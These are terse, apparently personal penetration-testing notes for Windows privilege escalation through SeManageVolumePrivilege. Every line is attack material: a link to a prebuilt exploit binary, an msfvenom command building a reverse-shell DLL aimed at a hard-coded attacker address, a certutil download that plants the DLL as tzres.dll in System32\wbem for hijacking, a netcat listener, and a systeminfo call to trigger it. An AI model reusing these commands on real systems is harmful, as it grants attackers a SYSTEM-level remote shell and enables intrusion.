SeManageVolume

https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.163 LPORT=135 -f dll -o tzres.dll

certutil -urlcache -split -f "http://192.168.45.163:8000/tzres.dll" C:\Windows\System32\wbem\tzres.dll

cd C:\Windows\System32\wbem\

nc -lvnp 135

systeminfo